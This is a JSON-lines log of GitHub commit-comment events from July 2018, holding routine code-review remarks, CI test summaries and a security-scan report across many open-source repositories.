{"id":"8014264159","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29824089,"position":35,"line":104,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"dcd5484ff780dae0370be66abc18c4a631362d86","created_at":"2018-07-25T05:32:58Z","updated_at":"2018-07-25T05:32:58Z","author_association":"OWNER","body":"Aaaa yasno ponyal chto ya upustil tut vse verno)"}},"created_at":"2018-07-25T05:32:58Z"}
{"id":"8014267913","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824095,"position":7,"line":6,"path":"test/iterators/getIterator.test.ts","commit_id":"0c61b26ac88726f7bf83e9cf846a587209ede6d8","created_at":"2018-07-25T05:34:26Z","updated_at":"2018-07-25T05:34:26Z","author_association":"CONTRIBUTOR","body":"The code actually says `Should return a value` instead of `an iterator.`\r\nYou could actually test that returned value is indeed an iterator by checking that it has defined a `next` function (duck typing).\r\n"}},"created_at":"2018-07-25T05:34:26Z"}
{"id":"8014268272","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29824096,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-25T05:34:35Z","updated_at":"2018-07-25T05:34:35Z","author_association":"CONTRIBUTOR","body":"buf if its not a bugfix then to dotnet and it will be next major release ?"}},"created_at":"2018-07-25T05:34:35Z"}
{"id":"8014270235","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824097,"position":null,"line":null,"path":null,"commit_id":"0c61b26ac88726f7bf83e9cf846a587209ede6d8","created_at":"2018-07-25T05:35:17Z","updated_at":"2018-07-25T05:35:17Z","author_association":"CONTRIBUTOR","body":"Maybe add a test to ensure that returned iterator can be used to iterate over all elements in exact same order as the source."}},"created_at":"2018-07-25T05:35:17Z"}
{"id":"8014270574","type":"CommitCommentEvent","actor":{"login":"ya3344"},"repo":{"name":"ya3344/Algorithm"},"payload":{"comment":{"id":29824098,"position":null,"line":null,"path":null,"commit_id":"960ebab419bdc41e0110b48ae44e43e898ac1a1e","created_at":"2018-07-25T05:35:24Z","updated_at":"2018-07-25T05:35:24Z","author_association":"OWNER","body":"fghfghdfgh"}},"created_at":"2018-07-25T05:35:24Z"}
{"id":"8014274895","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824105,"position":null,"line":null,"path":null,"commit_id":"5a126ac76387c3ae754595d0b09b994db247e31d","created_at":"2018-07-25T05:37:00Z","updated_at":"2018-07-25T05:37:00Z","author_association":"CONTRIBUTOR","body":"Missing tests for negative `skip` argument."}},"created_at":"2018-07-25T05:37:00Z"}
{"id":"8014277836","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29824110,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-25T05:38:07Z","updated_at":"2018-07-25T05:38:07Z","author_association":"MEMBER","body":"Yep"}},"created_at":"2018-07-25T05:38:07Z"}
{"id":"8014279402","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29824113,"position":4,"line":615,"path":"users.js","commit_id":"39606a179b6ae5dc9c8bbc7bb0858fe94f1b051c","created_at":"2018-07-25T05:38:42Z","updated_at":"2018-07-25T05:38:42Z","author_association":"OWNER","body":"Admins already get `bypassall` so this is really only relevant to leaders.\r\n\r\nI guess I'm fine with leaders being able to do this, but why is this stuff getting pushed without running it by me first?"}},"created_at":"2018-07-25T05:38:42Z"}
{"id":"8014280580","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29824118,"position":4,"line":615,"path":"users.js","commit_id":"39606a179b6ae5dc9c8bbc7bb0858fe94f1b051c","created_at":"2018-07-25T05:39:10Z","updated_at":"2018-07-25T05:39:10Z","author_association":"OWNER","body":"Of all people, _I_ should not be surprised by policy changes like this. I would have missed it entirely if panpawn hadn't commented on it."}},"created_at":"2018-07-25T05:39:10Z"}
{"id":"8014280890","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29824120,"position":null,"line":null,"path":null,"commit_id":"eabd4d59642a647988802228e7d48fbbeb5cdb29","created_at":"2018-07-25T05:39:17Z","updated_at":"2018-07-25T05:39:17Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - i386-Windows-7-VisualStudio-14: OK (2940 of 2944 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.86%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T05:39:17Z"}
{"id":"8014281924","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824134,"position":null,"line":null,"path":null,"commit_id":"03fab459ab851f5f1112948f206b422561fd3855","created_at":"2018-07-25T05:39:41Z","updated_at":"2018-07-25T05:39:41Z","author_association":"CONTRIBUTOR","body":"* Cover the case for mapping an empty array\r\n* Cover the case for using index inside map and ensure it is correctly provided:\r\nex: `(elem, idx) => idx` and then `expect(...).to.be.deep.equal([1,2,3, ...])`"}},"created_at":"2018-07-25T05:39:41Z"}
{"id":"8014287350","type":"CommitCommentEvent","actor":{"login":"hannabonert"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29824150,"position":null,"line":null,"path":null,"commit_id":"f04a621d3a07bb812faf6e1eda2e7fc9aa14c8f3","created_at":"2018-07-25T05:41:43Z","updated_at":"2018-07-25T05:41:43Z","author_association":"COLLABORATOR","body":"This was actually added in the Files Uploaded commit 2 commits ago, but I did not comment it properly, and wanted to have a record."}},"created_at":"2018-07-25T05:41:43Z"}
{"id":"8014289024","type":"CommitCommentEvent","actor":{"login":"mdhancher"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29824156,"position":null,"line":null,"path":null,"commit_id":"58d8db3081d7e0a3ed62121b33a60283303d8880","created_at":"2018-07-25T05:42:21Z","updated_at":"2018-07-25T05:42:21Z","author_association":"CONTRIBUTOR","body":"This change seems correct in itself: the JSON credentials work for me. However, when I try with no credentials from inside my Compute Engine instance it does not work.\r\n\r\nThe problem appears to be that CPLIsMachinePotentiallyGCEInstance() is returning 0, because CPLIsMachineForSureGCEInstance() is returning 0, because \"/var/log/kern.log\" exists but does not contain the magic string you are expecting.\r\n\r\nThat log file, like other log files in /var/log, can roll over. In this case, the file with the magic string you are looking for is now named \"/var/log/kern.log.1\", although of course you have no way of knowing that... checking this logfile does not seem to be a reliable mechanism."}},"created_at":"2018-07-25T05:42:21Z"}
{"id":"8014289101","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824157,"position":null,"line":null,"path":null,"commit_id":"824c9bae226762682aa8b967119756db5c82434e","created_at":"2018-07-25T05:42:22Z","updated_at":"2018-07-25T05:42:22Z","author_association":"CONTRIBUTOR","body":"Cover with tests cases when argument is negative.\r\nI assume there is no implementation for this, so have fun with TDD. Write tests first."}},"created_at":"2018-07-25T05:42:22Z"}
{"id":"8014289391","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"n-t-roff/heirloom"},"payload":{"comment":{"id":29824158,"position":51,"line":51,"path":"doctools.html","commit_id":"53e435f5f139b6f750bb79d2e0cd0a8ffb36265e","created_at":"2018-07-25T05:42:28Z","updated_at":"2018-07-25T05:42:28Z","author_association":"NONE","body":"@n-t-roff What element is this? The `<hl>` tag has never existed in any revision of the HTML specification, [past](https://www.w3.org/TR/html401/) or [present](https://www.w3.org/TR/html53/). As you can see, it's even breaking GitHub's syntax highlighting (since `<hl>` isn't a valid HTML tag).\r\n\r\nI'd suggest a correct alternative, but it's unclear what the intended purpose of `<hl>` is supposed to be. I've ruled out \"**H**eir**L**oom, since the tag is enclosing pretty arbitrary-looking text (see line 52 below):\r\n\r\n~~~html\r\nis most prominently used to <hl>format Unix manual pages</hl>\r\n~~~"}},"created_at":"2018-07-25T05:42:28Z"}
{"id":"8014289451","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"crdroidandroid/android_device_oneplus_msm8998-common"},"payload":{"comment":{"id":29824159,"position":null,"line":null,"path":null,"commit_id":"969a0289b69e19ec4c425ed1653825fa488acfc9","created_at":"2018-07-25T05:42:30Z","updated_at":"2018-07-25T05:42:30Z","author_association":"MEMBER","body":"Many devices reported issues with this and especially issue with GPS. Need to check for improvement in GPS with this disabled."}},"created_at":"2018-07-25T05:42:30Z"}
{"id":"8014292055","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824167,"position":null,"line":null,"path":null,"commit_id":"9b3443ef40913d31a114a526d5c15df5f5f461aa","created_at":"2018-07-25T05:43:32Z","updated_at":"2018-07-25T05:43:32Z","author_association":"CONTRIBUTOR","body":"Add a test to check that `average([])` throws an error."}},"created_at":"2018-07-25T05:43:32Z"}
{"id":"8014299520","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"Extum/flarum-theme-material"},"payload":{"comment":{"id":29824192,"position":null,"line":null,"path":null,"commit_id":"7b7180e7d802ae9c8e183aa73501976699d0ea02","created_at":"2018-07-25T05:46:14Z","updated_at":"2018-07-25T05:46:14Z","author_association":"MEMBER","body":"@Nathan2023 I don't know why but this started happening again. Do you confirm on the demo forum? https://flightsimtr.tk"}},"created_at":"2018-07-25T05:46:14Z"}
{"id":"8014299801","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824193,"position":null,"line":null,"path":null,"commit_id":"9b3443ef40913d31a114a526d5c15df5f5f461aa","created_at":"2018-07-25T05:46:20Z","updated_at":"2018-07-25T05:46:20Z","author_association":"CONTRIBUTOR","body":"However, should we throw or maybe return an `udnefined` value in this case?"}},"created_at":"2018-07-25T05:46:20Z"}
{"id":"8014302478","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29824200,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-25T05:47:16Z","updated_at":"2018-07-25T05:47:16Z","author_association":"CONTRIBUTOR","body":"one question, is dotnet stable enough for daily driver ? or its work-in-progress ?:P"}},"created_at":"2018-07-25T05:47:16Z"}
{"id":"8014302640","type":"CommitCommentEvent","actor":{"login":"kammce"},"repo":{"name":"kammce/SJSU-Dev2"},"payload":{"comment":{"id":29824201,"position":12,"line":12,"path":"firmware/library/L1_Drivers/gpio.hpp","commit_id":"b36720bc7962a44024ead9832f0158d7ab2535e3","created_at":"2018-07-25T05:47:20Z","updated_at":"2018-07-25T05:47:20Z","author_association":"OWNER","body":"Change this to SetDirection()\r\nPlease spell all words out in full."}},"created_at":"2018-07-25T05:47:20Z"}
{"id":"8014304970","type":"CommitCommentEvent","actor":{"login":"yonex8888"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29824207,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T05:48:05Z","updated_at":"2018-07-25T05:48:05Z","author_association":"NONE","body":"Great project"}},"created_at":"2018-07-25T05:48:05Z"}
{"id":"8014306210","type":"CommitCommentEvent","actor":{"login":"christinaa"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29824212,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T05:48:31Z","updated_at":"2018-07-25T05:48:31Z","author_association":"NONE","body":"There's a toolchain and a firmware that does what bootcode.bin does, you can chainload start.elf after executing your own code or you can just patch it. The firmware isn't an issue per se, it's not a doorstop, the hardware is fairly well understood by a couple of people, is documented and there's a nice IDA plugin for it if you want to RE it. And currently BCM is not shipping them with \"force bootcode.bin sigchecking\" OTP fuse blown, so I don't see how it's a doorstop, a large chunk of the hard work has already been done for you.\r\n\r\n-----\r\n\r\nWhy ATF though? The \"trusted\" part is not something that you can provide because of hardware limitations, and I'll explain.\r\n\r\nI do not believe it is physically possible to securely execute on RPi3, you don't have a GIC and the async bridge between the system bus and the hacked on ARM code forces all ARM accesses to appear as insecure. The security extensions are entirely for VPU's use, and are of little to no use to ARM aside from having another exception level, but what's the point when you are just able to patch the exception handler of the secure code (since you lack any way to protect memory regions from ARM's point of view aka TZPCs). So yes you start in EL3 but unless it's for debugging it's kinda useless. Anything you do from the VPU short of some serious emulation over the software debugging interface or some other hack will still not get ARM to appear as secure. "}},"created_at":"2018-07-25T05:48:31Z"}
{"id":"8014307114","type":"CommitCommentEvent","actor":{"login":"bariod"},"repo":{"name":"b3none/B3Gloves"},"payload":{"comment":{"id":29824216,"position":53,"line":60,"path":"scripting/b3gloves.sp","commit_id":"716d34648ae0e3a6bdc2c2f643113c0b9e0c9365","created_at":"2018-07-25T05:48:51Z","updated_at":"2018-07-25T05:48:51Z","author_association":"NONE","body":"No newline REEEEE"}},"created_at":"2018-07-25T05:48:51Z"}
{"id":"8014309028","type":"CommitCommentEvent","actor":{"login":"kersing"},"repo":{"name":"jpmeijers/ttn-resin-gateway-rpi"},"payload":{"comment":{"id":29824220,"position":null,"line":null,"path":null,"commit_id":"38ef832c01b614e8f04613cc4eb03093c88ec51e","created_at":"2018-07-25T05:49:34Z","updated_at":"2018-07-25T05:49:34Z","author_association":"NONE","body":"SPI_SPEED is way to high, should be 8000000"}},"created_at":"2018-07-25T05:49:34Z"}
{"id":"8014312435","type":"CommitCommentEvent","actor":{"login":"kammce"},"repo":{"name":"kammce/SJSU-Dev2"},"payload":{"comment":{"id":29824225,"position":18,"line":18,"path":"firmware/library/L1_Drivers/dac.hpp","commit_id":"1da32583b989e906d20593cb04d09f3bcec67fcb","created_at":"2018-07-25T05:50:44Z","updated_at":"2018-07-25T05:50:44Z","author_association":"OWNER","body":"Method name does confirm to style."}},"created_at":"2018-07-25T05:50:44Z"}
{"id":"8014315262","type":"CommitCommentEvent","actor":{"login":"JinKanai"},"repo":{"name":"pymee/studygroup"},"payload":{"comment":{"id":29824230,"position":null,"line":null,"path":null,"commit_id":"0c2d23245bd3d923b0a2dd88d1d74518a5141d4d","created_at":"2018-07-25T05:51:40Z","updated_at":"2018-07-25T05:51:40Z","author_association":"CONTRIBUTOR","body":"ありがとうございます～問題ないと思います。"}},"created_at":"2018-07-25T05:51:40Z"}
{"id":"8014317503","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"Extum/flarum-theme-material"},"payload":{"comment":{"id":29824232,"position":null,"line":null,"path":null,"commit_id":"7b7180e7d802ae9c8e183aa73501976699d0ea02","created_at":"2018-07-25T05:52:22Z","updated_at":"2018-07-25T05:52:22Z","author_association":"MEMBER","body":"@Nathan2023 Fixed issue with 29d6ca1."}},"created_at":"2018-07-25T05:52:22Z"}
{"id":"8014318518","type":"CommitCommentEvent","actor":{"login":"Keloo"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824234,"position":null,"line":null,"path":null,"commit_id":"9b3443ef40913d31a114a526d5c15df5f5f461aa","created_at":"2018-07-25T05:52:44Z","updated_at":"2018-07-25T05:52:44Z","author_association":"COLLABORATOR","body":"We'll use `undefined` to preserve the same behavior in the whole code logic."}},"created_at":"2018-07-25T05:52:44Z"}
{"id":"8014318794","type":"CommitCommentEvent","actor":{"login":"rsiddiqui1"},"repo":{"name":"rsiddiqui1/Test"},"payload":{"comment":{"id":29824235,"position":null,"line":null,"path":null,"commit_id":"8e801908d01c6f07e0a0a57a0cd035f8f2471c47","created_at":"2018-07-25T05:52:50Z","updated_at":"2018-07-25T05:52:50Z","author_association":"OWNER","body":"\r\n[CLOUD.docx](https://github.com/rsiddiqui1/Test/files/2226662/CLOUD.docx)\r\n"}},"created_at":"2018-07-25T05:52:50Z"}
{"id":"8014324990","type":"CommitCommentEvent","actor":{"login":"SunbossRS"},"repo":{"name":"740291272/740291272.github.io"},"payload":{"comment":{"id":29824245,"position":null,"line":null,"path":null,"commit_id":"d86b30b083972f3e3730649ae2b33e019c359d5c","created_at":"2018-07-25T05:55:02Z","updated_at":"2018-07-25T05:55:02Z","author_association":"NONE","body":"555 I cannot do this ...."}},"created_at":"2018-07-25T05:55:02Z"}
{"id":"8014329191","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29824253,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-25T05:56:29Z","updated_at":"2018-07-25T05:56:29Z","author_association":"OWNER","body":"Checkmarx scan results 25 Jul 2018 08:56 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-25T05:56:29Z"}
{"id":"8014330479","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29824259,"position":174,"line":222,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T05:56:58Z","updated_at":"2018-07-25T05:56:58Z","author_association":"OWNER","body":"Here we demonstrated the steps to building deep learning-based computer vision pipelines that can run object detection and segmentation tasks at scale. We continue to work towards the two goals mentioned earlier: scalability to very large data volumes, which requires processing efficiency; repurposability towards computer vision tasks on other geospatial features, which requires a general-purpose design.\r\n\r\n\r\nFor our object detection pipelines, we now plan to experiment with the newly published YOLOv3 [yolov3]_ architecture, which has shown significant improvement in detecting small objects. It's accuracy on the COCO dataset is on par with the SSD but is 3 times faster. As mentioned before, low latency prediction is essential when we deploying to production. For semantic segmentation, we ran our first round of large-scale parking lot segmentation over Atlanta, Baltimore, Sacramento, and Seattle. In preparation for running inference on millions of high resolution aerial imagery over all of North America, we made a few improvements to our model. First, we completed one round of hard negative mining and added 49,969 negative samples to our training set. Second, we replaced the standard U-Net encoder with pre-trained ResNet50 encoder to speed up training and prediction. We have also replaced the learned deconvolutions with nearest neighbor upsampling followed by a convolution for refinement instead.\r\n\r\nWe designed our tools and pipelines with the intent that other practitioners would find it straightforward to adapt them to landscapes and landscape features that we have not anticipated. We open sourced an end-to-end semantic segmantion pipeline, Robosat [robosat]_, along with all its tools in June 2018. We are also experimenting with building segmentation in unmanned aerial vehicle (UAV) imagery from the OpenAerialMap project in Tanzania [tanzania]_, to explore the challenges of very high-resolution imagery and a landscape unlike the ones we have trained on thus far. \r\n\r\n\r\n[robosat] Mapbox (2018): Robosat. https://github.com/mapbox/robosat"}},"created_at":"2018-07-25T05:56:58Z"}
{"id":"8014332109","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29824263,"position":null,"line":null,"path":null,"commit_id":"32d4962af61e376c0e94c07cb728c978ab71fa2a","created_at":"2018-07-25T05:57:30Z","updated_at":"2018-07-25T05:57:30Z","author_association":"MEMBER","body":"You could try using VS17 and fully updating it. We think that this error should then be caught by VS."}},"created_at":"2018-07-25T05:57:30Z"}
{"id":"8014332139","type":"CommitCommentEvent","actor":{"login":"akshayvenkatesan"},"repo":{"name":"akshayvenkatesan/GECS"},"payload":{"comment":{"id":29824264,"position":276,"line":156,"path":"application/views/registration.php","commit_id":"55784c00476ac3c116a6c56b90f05b8772de5b63","created_at":"2018-07-25T05:57:31Z","updated_at":"2018-07-25T05:57:31Z","author_association":"OWNER","body":"should be GecsProfId . Spelling error\r\n"}},"created_at":"2018-07-25T05:57:31Z"}
{"id":"8014336858","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29824269,"position":null,"line":null,"path":null,"commit_id":"5b8d798be41f3ff448ca6ea697ac9c8ca879522f","created_at":"2018-07-25T05:59:08Z","updated_at":"2018-07-25T05:59:08Z","author_association":"MEMBER","body":"Tell the stations to provide easy access and ask them if its legal to play them anywhere else. I mean  it's possible that we have to remove the \"I love\" streams in the future."}},"created_at":"2018-07-25T05:59:08Z"}
{"id":"8014336985","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29824270,"position":3,"line":3,"path":"pkgs/applications/office/libreoffice/wrapper.sh","commit_id":"95a819c0026a7a3c0dd2099e1c53fea95430c505","created_at":"2018-07-25T05:59:10Z","updated_at":"2018-07-25T05:59:10Z","author_association":"MEMBER","body":"I have already rolled back that change in the master, but maybe auto would work better…"}},"created_at":"2018-07-25T05:59:10Z"}
{"id":"8014337871","type":"CommitCommentEvent","actor":{"login":"florent-lamiraux"},"repo":{"name":"humanoid-path-planner/hpp-pinocchio"},"payload":{"comment":{"id":29824272,"position":null,"line":null,"path":null,"commit_id":"ce4b3ac344b8d62db733df6fdf2e33aa2057c917","created_at":"2018-07-25T05:59:28Z","updated_at":"2018-07-25T05:59:28Z","author_association":"CONTRIBUTOR","body":"What is the rationale of moving operator* inside boost namespace ?"}},"created_at":"2018-07-25T05:59:28Z"}
{"id":"8014339235","type":"CommitCommentEvent","actor":{"login":"TakesTheBiscuit"},"repo":{"name":"SFTtech/openage"},"payload":{"comment":{"id":29824275,"position":null,"line":null,"path":null,"commit_id":"ccb5c3932d8a5217840132423a3f8f9c75b36cde","created_at":"2018-07-25T05:59:58Z","updated_at":"2018-07-25T05:59:58Z","author_association":"NONE","body":"Line 786\r\n'Defense'; did you know that's the American English spelling? 😊"}},"created_at":"2018-07-25T05:59:58Z"}
{"id":"8014341367","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29824289,"position":31,"line":5370,"path":"engine/class_modules/sc_druid.cpp","commit_id":"a3c27cb469e21402808e4b71e47aaa8f37c1d522","created_at":"2018-07-25T06:00:38Z","updated_at":"2018-07-25T06:00:38Z","author_association":"MEMBER","body":"No need to cache that value here. Accessing p -> azerite.layered_mane.ok() directly is equally good/performant."}},"created_at":"2018-07-25T06:00:38Z"}
{"id":"8014342962","type":"CommitCommentEvent","actor":{"login":"PypeBros"},"repo":{"name":"dbeef/spelunky-ds"},"payload":{"comment":{"id":29824297,"position":null,"line":null,"path":null,"commit_id":"fd9bf58378ca372d2e25b16667f775c155a8c4f5","created_at":"2018-07-25T06:01:11Z","updated_at":"2018-07-25T06:01:11Z","author_association":"NONE","body":"indeed. got the music playing on my R4-clone."}},"created_at":"2018-07-25T06:01:11Z"}
{"id":"8014348547","type":"CommitCommentEvent","actor":{"login":"michaelwittig"},"repo":{"name":"widdix/aws-cf-templates"},"payload":{"comment":{"id":29824305,"position":null,"line":null,"path":null,"commit_id":"2429f282f44e20d4b17b7add81b1e5c239ac173b","created_at":"2018-07-25T06:03:00Z","updated_at":"2018-07-25T06:03:00Z","author_association":"CONTRIBUTOR","body":"I agree :) My new default is to use the stack name as the group name.\r\n\r\nWe still have some legacy group names in the templates. But they don't use ImportValue so that's okay."}},"created_at":"2018-07-25T06:03:00Z"}
{"id":"8014353118","type":"CommitCommentEvent","actor":{"login":"ar1a"},"repo":{"name":"hlissner/doom-emacs"},"payload":{"comment":{"id":29824310,"position":null,"line":null,"path":null,"commit_id":"a8d41a93c00266e3e3bef3cde170691fb79eb53e","created_at":"2018-07-25T06:04:29Z","updated_at":"2018-07-25T06:04:29Z","author_association":"NONE","body":"2 much copy paste"}},"created_at":"2018-07-25T06:04:29Z"}
{"id":"8014353454","type":"CommitCommentEvent","actor":{"login":"Osso13"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29824312,"position":null,"line":null,"path":null,"commit_id":"181ef94a3fb5fba449216f3935c054c2a3d45c69","created_at":"2018-07-25T06:04:36Z","updated_at":"2018-07-25T06:04:36Z","author_association":"MEMBER","body":"Updated, thanks. I really doubt it's useful to have the year in 3 different places in the source, but it is what it is and I shouldn't have been so sloppy."}},"created_at":"2018-07-25T06:04:36Z"}
{"id":"8014353997","type":"CommitCommentEvent","actor":{"login":"Bartuz"},"repo":{"name":"joshukraine/mac-bootstrap"},"payload":{"comment":{"id":29824315,"position":null,"line":null,"path":null,"commit_id":"4ea310e4cc1eea1321f8db8ae7cf874db3b89000","created_at":"2018-07-25T06:04:48Z","updated_at":"2018-07-25T06:04:48Z","author_association":"NONE","body":"I'm just curious, what was the reason to make such change? It seems previous version was easier to manage"}},"created_at":"2018-07-25T06:04:48Z"}
{"id":"8014354827","type":"CommitCommentEvent","actor":{"login":"andypalmer"},"repo":{"name":"Becca9941/portfolio-webdevbecca"},"payload":{"comment":{"id":29824317,"position":17,"line":152,"path":"individual-article.php","commit_id":"0f160eee33d7c25a06d98521551c1a376c1af0a6","created_at":"2018-07-25T06:05:05Z","updated_at":"2018-07-25T06:05:05Z","author_association":"NONE","body":"You can make this less verbose using the shorthand\r\n```php\r\n<?= $readTime ?>\r\n```"}},"created_at":"2018-07-25T06:05:05Z"}
{"id":"8014354881","type":"CommitCommentEvent","actor":{"login":"bycczzc"},"repo":{"name":"bycczzc/hello-world"},"payload":{"comment":{"id":29824318,"position":2,"line":2,"path":"README.md","commit_id":"796a714199ddba9a1294cbbc547229c62530fb2d","created_at":"2018-07-25T06:05:06Z","updated_at":"2018-07-25T06:05:06Z","author_association":"OWNER","body":"as "}},"created_at":"2018-07-25T06:05:06Z"}
{"id":"8014354889","type":"CommitCommentEvent","actor":{"login":"lvpengpeng"},"repo":{"name":"lvpengpeng/react_dzdp"},"payload":{"comment":{"id":29824319,"position":null,"line":null,"path":null,"commit_id":"5341d71b935efed5b5203c18fa80b878d22134ef","created_at":"2018-07-25T06:05:06Z","updated_at":"2018-07-25T06:05:06Z","author_association":"OWNER","body":"mock文件夹的server.js里也需要添加商家详细的后端接口输出：\r\n// 详情页 - 商户信息\r\nconst detailInfo = require('./detail/info.js')\r\nrouter.get('/api/detail/info/:id', function *(next) {\r\n    console.log('详情页 - 商户信息')\r\n\r\n    const params = this.params\r\n    const id = params.id\r\n\r\n    console.log('商户id: ' + id)\r\n\r\n    this.body = detailInfo\r\n})"}},"created_at":"2018-07-25T06:05:06Z"}
{"id":"8014355832","type":"CommitCommentEvent","actor":{"login":"Bartuz"},"repo":{"name":"joshukraine/mac-bootstrap"},"payload":{"comment":{"id":29824322,"position":5,"line":108,"path":"bootstrap","commit_id":"4ea310e4cc1eea1321f8db8ae7cf874db3b89000","created_at":"2018-07-25T06:05:25Z","updated_at":"2018-07-25T06:05:25Z","author_association":"NONE","body":"👋 😿 "}},"created_at":"2018-07-25T06:05:25Z"}
{"id":"8014356564","type":"CommitCommentEvent","actor":{"login":"mrjdrs"},"repo":{"name":"mrjdrs/SpringcloudConfig"},"payload":{"comment":{"id":29824324,"position":null,"line":null,"path":null,"commit_id":"89429af63a35e60f52cc1e9cb2fc19cc6978a3d9","created_at":"2018-07-25T06:05:39Z","updated_at":"2018-07-25T06:05:39Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-25T06:05:39Z"}
